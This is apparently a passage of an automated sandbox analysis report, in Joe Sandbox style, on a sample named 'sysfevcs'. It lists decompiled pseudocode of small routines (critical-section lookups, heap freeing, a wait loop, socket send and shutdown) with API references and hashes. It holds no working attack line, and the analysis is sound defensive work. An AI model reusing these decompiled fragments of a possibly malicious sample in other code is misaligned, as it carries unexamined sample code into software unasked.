                                                                                                                                                                                                                                                                  • shutdown.WS2_32(0040930D,00000002), ref: 00409329
                                                                                                                                                                                                                                                                  • closesocket.WS2_32(0040930D), ref: 00409333
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: closesocketshutdown
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 572888783-0
                                                                                                                                                                                                                                                                  • Opcode ID: e42cfb8fb80c0779ab4435fda3cbc841228f74ca927c05e947735d5def6d7b18
                                                                                                                                                                                                                                                                  • Instruction ID: 04947d64ec5647e42ca79717e8c3a41c032b86c2d7d6d982fd8d21b2c7aa16dc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e42cfb8fb80c0779ab4435fda3cbc841228f74ca927c05e947735d5def6d7b18
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9C08C79144308BBCB10AFB0ED0DD893B6CEB08241F004078FA498B641CA73E4008B94
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E004044F0(intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                                                                                  				char _v5;
                                                                                                                                                                                                                                                                  				void* _v12;
                                                                                                                                                                                                                                                                  				signed int _v16;
                                                                                                                                                                                                                                                                  				void* _t32;
                                                                                                                                                                                                                                                                  				signed int _t36;
                                                                                                                                                                                                                                                                  				void* _t38;
                                                                                                                                                                                                                                                                  				void* _t41;
                                                                                                                                                                                                                                                                  				intOrPtr _t42;
                                                                                                                                                                                                                                                                  				signed int _t44;
                                                                                                                                                                                                                                                                  				signed int _t49;
                                                                                                                                                                                                                                                                  				void* _t54;
                                                                                                                                                                                                                                                                  				intOrPtr _t55;
                                                                                                                                                                                                                                                                  				void* _t64;
                                                                                                                                                                                                                                                                  				void* _t65;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v5 = 0;
                                                                                                                                                                                                                                                                  				EnterCriticalSection(0x412f50);
                                                                                                                                                                                                                                                                  				_t32 = E0040AF30(_t41, _a12); // executed
                                                                                                                                                                                                                                                                  				_t65 = _t64 + 4;
                                                                                                                                                                                                                                                                  				_v12 = _t32;
                                                                                                                                                                                                                                                                  				if(_v12 != 0) {
                                                                                                                                                                                                                                                                  					if( *0x412f6c != 0) {
                                                                                                                                                                                                                                                                  						_v16 = 0;
                                                                                                                                                                                                                                                                  						while(1) {
                                                                                                                                                                                                                                                                  							__eflags = _v16 -  *0x412f6c; // 0x1
                                                                                                                                                                                                                                                                  							if(__eflags >= 0) {
                                                                                                                                                                                                                                                                  								goto L15;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							_t36 = _v16 * 0x110;
                                                                                                                                                                                                                                                                  							_t42 =  *0x412f68; // 0x222c120
                                                                                                                                                                                                                                                                  							_t54 = _v12;
                                                                                                                                                                                                                                                                  							__eflags =  *((intOrPtr*)(_t42 + _t36 + 4)) -  *((intOrPtr*)(_t54 + 4));
                                                                                                                                                                                                                                                                  							if( *((intOrPtr*)(_t42 + _t36 + 4)) ==  *((intOrPtr*)(_t54 + 4))) {
                                                                                                                                                                                                                                                                  								_t44 = _v16 * 0x110;
                                                                                                                                                                                                                                                                  								_t55 =  *0x412f68; // 0x222c120
                                                                                                                                                                                                                                                                  								_t38 = _v12;
                                                                                                                                                                                                                                                                  								__eflags =  *((intOrPtr*)(_t55 + _t44 + 8)) -  *((intOrPtr*)(_t38 + 8));
                                                                                                                                                                                                                                                                  								if( *((intOrPtr*)(_t55 + _t44 + 8)) <  *((intOrPtr*)(_t38 + 8))) {
                                                                                                                                                                                                                                                                  									_v5 = 1;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								__eflags = _a16;
                                                                                                                                                                                                                                                                  								if(_a16 != 0) {
                                                                                                                                                                                                                                                                  									memcpy(_a16, _v12, 0x40 << 2);
                                                                                                                                                                                                                                                                  									_t65 = _t65 + 0xc;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								_t49 = _v16 + 1;
                                                                                                                                                                                                                                                                  								__eflags = _t49;
                                                                                                                                                                                                                                                                  								_v16 = _t49;
                                                                                                                                                                                                                                                                  								continue;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							goto L15;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						_v5 = 1;
                                                                                                                                                                                                                                                                  						if(_a16 != 0) {
                                                                                                                                                                                                                                                                  							memcpy(_a16, _v12, 0x40 << 2);
                                                                                                                                                                                                                                                                  							_t65 = _t65 + 0xc;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					L15:
                                                                                                                                                                                                                                                                  					E00408990(_v12);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				LeaveCriticalSection(0x412f50);
                                                                                                                                                                                                                                                                  				return _v5;
                                                                                                                                                                                                                                                                  			}

















                                                                                                                                                                                                                                                                  0x004044f8
                                                                                                                                                                                                                                                                  0x00404501
                                                                                                                                                                                                                                                                  0x0040450b
                                                                                                                                                                                                                                                                  0x00404510
                                                                                                                                                                                                                                                                  0x00404513
                                                                                                                                                                                                                                                                  0x0040451a
                                                                                                                                                                                                                                                                  0x00404527
                                                                                                                                                                                                                                                                  0x00404542
                                                                                                                                                                                                                                                                  0x00404554
                                                                                                                                                                                                                                                                  0x00404557
                                                                                                                                                                                                                                                                  0x0040455d
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00404562
                                                                                                                                                                                                                                                                  0x00404568
                                                                                                                                                                                                                                                                  0x0040456e
                                                                                                                                                                                                                                                                  0x00404575
                                                                                                                                                                                                                                                                  0x00404578
                                                                                                                                                                                                                                                                  0x0040457f
                                                                                                                                                                                                                                                                  0x00404585
                                                                                                                                                                                                                                                                  0x0040458b
                                                                                                                                                                                                                                                                  0x00404592
                                                                                                                                                                                                                                                                  0x00404595
                                                                                                                                                                                                                                                                  0x00404597
                                                                                                                                                                                                                                                                  0x00404597
                                                                                                                                                                                                                                                                  0x0040459b
                                                                                                                                                                                                                                                                  0x0040459f
                                                                                                                                                                                                                                                                  0x004045ac
                                                                                                                                                                                                                                                                  0x004045ac
                                                                                                                                                                                                                                                                  0x004045ac
                                                                                                                                                                                                                                                                  0x0040457a
                                                                                                                                                                                                                                                                  0x0040454e
                                                                                                                                                                                                                                                                  0x0040454e
                                                                                                                                                                                                                                                                  0x00404551
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00404551
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00404578
                                                                                                                                                                                                                                                                  0x00404529
                                                                                                                                                                                                                                                                  0x00404529
                                                                                                                                                                                                                                                                  0x00404531
                                                                                                                                                                                                                                                                  0x0040453e
                                                                                                                                                                                                                                                                  0x0040453e
                                                                                                                                                                                                                                                                  0x0040453e
                                                                                                                                                                                                                                                                  0x00404540
                                                                                                                                                                                                                                                                  0x004045b2
                                                                                                                                                                                                                                                                  0x004045b6
                                                                                                                                                                                                                                                                  0x004045bb
                                                                                                                                                                                                                                                                  0x004045c3
                                                                                                                                                                                                                                                                  0x004045d1

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00412F50,?,?,?,00000000,?), ref: 00404501
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00412F50,?,?), ref: 004045C3
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                  • Opcode ID: 8b1bad97e66df7ddc2e3717eb4baf561b98d9d18f14dac0515b1eaee3f35a7b3
                                                                                                                                                                                                                                                                  • Instruction ID: 10fd424a52c552a8dd161adcd66ab1ad9dd940ef7dbf6c217d3bbe0479f53a60
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8b1bad97e66df7ddc2e3717eb4baf561b98d9d18f14dac0515b1eaee3f35a7b3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B2123B4900208EBCF14CF54D9497DEB7B1EB84314F1480BAE6467B381C378A996DB99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                                                                                                                                  			E004099A0(void* __ecx) {
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				intOrPtr _t7;
                                                                                                                                                                                                                                                                  				signed int _t8;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t9 = __ecx;
                                                                                                                                                                                                                                                                  				_push(__ecx);
                                                                                                                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                                                                                                                  				EnterCriticalSection(0x4139ac);
                                                                                                                                                                                                                                                                  				if( *0x4139e4 != 0) {
                                                                                                                                                                                                                                                                  					_t7 =  *0x4139e4; // 0x200
                                                                                                                                                                                                                                                                  					_t8 = E0040A5D0(_t9, _t7); // executed
                                                                                                                                                                                                                                                                  					_v8 =  *((intOrPtr*)(0x4139e8 + _t8 * 4));
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				LeaveCriticalSection(0x4139ac);
                                                                                                                                                                                                                                                                  				return _v8;
                                                                                                                                                                                                                                                                  			}






                                                                                                                                                                                                                                                                  0x004099a0
                                                                                                                                                                                                                                                                  0x004099a3
                                                                                                                                                                                                                                                                  0x004099a4
                                                                                                                                                                                                                                                                  0x004099b0
                                                                                                                                                                                                                                                                  0x004099bd
                                                                                                                                                                                                                                                                  0x004099bf
                                                                                                                                                                                                                                                                  0x004099c5
                                                                                                                                                                                                                                                                  0x004099d4
                                                                                                                                                                                                                                                                  0x004099d4
                                                                                                                                                                                                                                                                  0x004099dc
                                                                                                                                                                                                                                                                  0x004099e8

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(004139AC,?,?,0040B5C9), ref: 004099B0
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(004139AC,?,?,0040B5C9), ref: 004099DC
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                  • Opcode ID: 71c5412ca95376399b4ef9c70699303f32369dd8cddd7820367437fb730b01f3
                                                                                                                                                                                                                                                                  • Instruction ID: ad361287a46d4d074dcd26cfde6cdb8cd5ad2ba83b65f2788037448da51a7965
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 71c5412ca95376399b4ef9c70699303f32369dd8cddd7820367437fb730b01f3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F8E0DFF0A11208EBCB10CFC4FE0AB9A77B4E704306F20407AE404A7391D6B6AF14CA5E
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E00409470() {
                                                                                                                                                                                                                                                                  				void* _t1;
                                                                                                                                                                                                                                                                  				void* _t2;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				EnterCriticalSection(0x4139ac); // executed
                                                                                                                                                                                                                                                                  				_t2 = E00409380(_t1); // executed
                                                                                                                                                                                                                                                                  				LeaveCriticalSection(0x4139ac);
                                                                                                                                                                                                                                                                  				return _t2;
                                                                                                                                                                                                                                                                  			}





                                                                                                                                                                                                                                                                  0x00409478
                                                                                                                                                                                                                                                                  0x0040947e
                                                                                                                                                                                                                                                                  0x00409488
                                                                                                                                                                                                                                                                  0x0040948f

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(004139AC,?,00409B97), ref: 00409478
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(004139AC,?,00409B97), ref: 00409488
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                  • Opcode ID: cf52881a778fe408c0aa8b795ef71b40b6d0c8673166777856b0f99a492a853c
                                                                                                                                                                                                                                                                  • Instruction ID: d0f5687ae446f57944ae61e505a4b729cb59523bfc60dabf5efaf57ae7d21958
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cf52881a778fe408c0aa8b795ef71b40b6d0c8673166777856b0f99a492a853c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14B09B7115034CD7C6103BD1FD0B7C5365895447273200132F44DA849349F55D544D5F
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E00408990(intOrPtr _a4) {
                                                                                                                                                                                                                                                                  				void _v8;
                                                                                                                                                                                                                                                                  				void* _v12;
                                                                                                                                                                                                                                                                  				signed int _t13;
                                                                                                                                                                                                                                                                  				signed char _t14;
                                                                                                                                                                                                                                                                  				void* _t18;
                                                                                                                                                                                                                                                                  				char _t19;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t13 = E00408570() & 0x000000ff;
                                                                                                                                                                                                                                                                  				if(_t13 == 0) {
                                                                                                                                                                                                                                                                  					return _t13;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_t14 = E00408590(_a4);
                                                                                                                                                                                                                                                                  				if((_t14 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                  					_v12 = _a4 - 8;
                                                                                                                                                                                                                                                                  					_v8 =  *_v12;
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)(_v12 + 4)) = 0xdeadbeef;
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)(_v12 + _v8 + 8)) = 0xdeadbeef;
                                                                                                                                                                                                                                                                  					_t18 =  *0x412f74; // 0x2220000
                                                                                                                                                                                                                                                                  					_t19 = RtlFreeHeap(_t18, 0, _v12); // executed
                                                                                                                                                                                                                                                                  					return _t19;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t14;
                                                                                                                                                                                                                                                                  			}









                                                                                                                                                                                                                                                                  0x0040899b
                                                                                                                                                                                                                                                                  0x004089a0
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004089a8
                                                                                                                                                                                                                                                                  0x004089b5
                                                                                                                                                                                                                                                                  0x004089bd
                                                                                                                                                                                                                                                                  0x004089c5
                                                                                                                                                                                                                                                                  0x004089cb
                                                                                                                                                                                                                                                                  0x004089d8
                                                                                                                                                                                                                                                                  0x004089e5
                                                                                                                                                                                                                                                                  0x004089eb
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004089eb
                                                                                                                                                                                                                                                                  0x004089f4

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00408570: GetCurrentProcessId.KERNEL32(?,0040878B,?,0040AD7E,00000010,?,?,?,?,?,?,0040AE9B), ref: 00408573
                                                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(02220000,00000000,00401192,?,00401192,?), ref: 004089EB
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CurrentFreeHeapProcess
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3855406826-0
                                                                                                                                                                                                                                                                  • Opcode ID: f87fc20fdcca4b24c6454cebd1781da52545f34e58c297dcd1963172c5472df2
                                                                                                                                                                                                                                                                  • Instruction ID: ce51089a0d3f050f1cd6dc663a9412f0ea3189736f145f7fedcfa55af3f6b6b1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f87fc20fdcca4b24c6454cebd1781da52545f34e58c297dcd1963172c5472df2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30F0A9B4900108EBD704DF94D94096DBB75AF44304F10C1AEE944AB382FA35D941C799
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • send.WS2_32(00000000,00000000,?,00000000), ref: 0040B1BF
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: send
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2809346765-0
                                                                                                                                                                                                                                                                  • Opcode ID: 547ae21534bf263187ea0c47714e6b8c5e1cd0da658e3fea20752c23c9daafdb
                                                                                                                                                                                                                                                                  • Instruction ID: 65d6f29244f456d0f9217434b711c5846459c73059db42e940a0f116ca8873ca
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 547ae21534bf263187ea0c47714e6b8c5e1cd0da658e3fea20752c23c9daafdb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13013C3490424DFFCB00CFA8C894B9E7BB4FB08304F1085A9E815AB381C7759699CB95
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                                                                                                                                                  			E0040B5C0(void* __ecx) {
                                                                                                                                                                                                                                                                  				LONG* _v8;
                                                                                                                                                                                                                                                                  				LONG* _t4;
                                                                                                                                                                                                                                                                  				signed char _t5;
                                                                                                                                                                                                                                                                  				void* _t10;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t8 = __ecx;
                                                                                                                                                                                                                                                                  				_push(__ecx); // executed
                                                                                                                                                                                                                                                                  				while(1) {
                                                                                                                                                                                                                                                                  					_t4 = E004099A0(_t8); // executed
                                                                                                                                                                                                                                                                  					_v8 = _t4;
                                                                                                                                                                                                                                                                  					if(_v8 != 0) {
                                                                                                                                                                                                                                                                  						E0040B420(_v8, 0); // executed
                                                                                                                                                                                                                                                                  						_t10 = _t10 + 8;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_t8 =  *0x4139c4; // 0x538
                                                                                                                                                                                                                                                                  					_t5 = WaitForSingleObject(_t8, 0x1388);
                                                                                                                                                                                                                                                                  					if(_t5 != 0x102) {
                                                                                                                                                                                                                                                                  						break;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_t5 = E00409BD0();
                                                                                                                                                                                                                                                                  					if((_t5 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                  						continue;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					break;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t5;
                                                                                                                                                                                                                                                                  			}







                                                                                                                                                                                                                                                                  0x0040b5c0
                                                                                                                                                                                                                                                                  0x0040b5c3
                                                                                                                                                                                                                                                                  0x0040b5c4
                                                                                                                                                                                                                                                                  0x0040b5c4
                                                                                                                                                                                                                                                                  0x0040b5c9
                                                                                                                                                                                                                                                                  0x0040b5d0
                                                                                                                                                                                                                                                                  0x0040b5d8
                                                                                                                                                                                                                                                                  0x0040b5dd
                                                                                                                                                                                                                                                                  0x0040b5dd
                                                                                                                                                                                                                                                                  0x0040b5e5
                                                                                                                                                                                                                                                                  0x0040b5ec
                                                                                                                                                                                                                                                                  0x0040b5f7
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040b5f9
                                                                                                                                                                                                                                                                  0x0040b603
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040b603
                                                                                                                                                                                                                                                                  0x0040b608

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 004099A0: EnterCriticalSection.KERNEL32(004139AC,?,?,0040B5C9), ref: 004099B0
                                                                                                                                                                                                                                                                    • Part of subcall function 004099A0: LeaveCriticalSection.KERNEL32(004139AC,?,?,0040B5C9), ref: 004099DC
                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000538,00001388), ref: 0040B5EC
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B420: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040B42C
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterExchangeInterlockedLeaveObjectSingleWait
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3309573332-0
                                                                                                                                                                                                                                                                  • Opcode ID: 8c03b7896388993baf64103a066e72e70890a5a2e9efb65818d5ee4b03130e35
                                                                                                                                                                                                                                                                  • Instruction ID: 95667295006d6dabfa4fe9ca8573798661f7e5bb1cce4e9c1f26b5bb8c3ed677
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c03b7896388993baf64103a066e72e70890a5a2e9efb65818d5ee4b03130e35
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7E092B0910208B7C714E7A19C06B6F726ADB50309F5444BAF500763C2DABE9E40D6DD
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00405610
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateInstance
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 542301482-0
                                                                                                                                                                                                                                                                  • Opcode ID: 74bb25a94bfc19ff74907871cb7c4d9e76af29d40dac5f6b3f1c7a9f19d7fb6d
                                                                                                                                                                                                                                                                  • Instruction ID: 7aed3207766a6e743f2c2415cc60b3378215449473b78a7322538582fa29d962
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74bb25a94bfc19ff74907871cb7c4d9e76af29d40dac5f6b3f1c7a9f19d7fb6d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 96E0ED74D0020CFFDF10DF90D889B9EBBB8EB04315F5081A9E9046B280D7765A84CB95
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

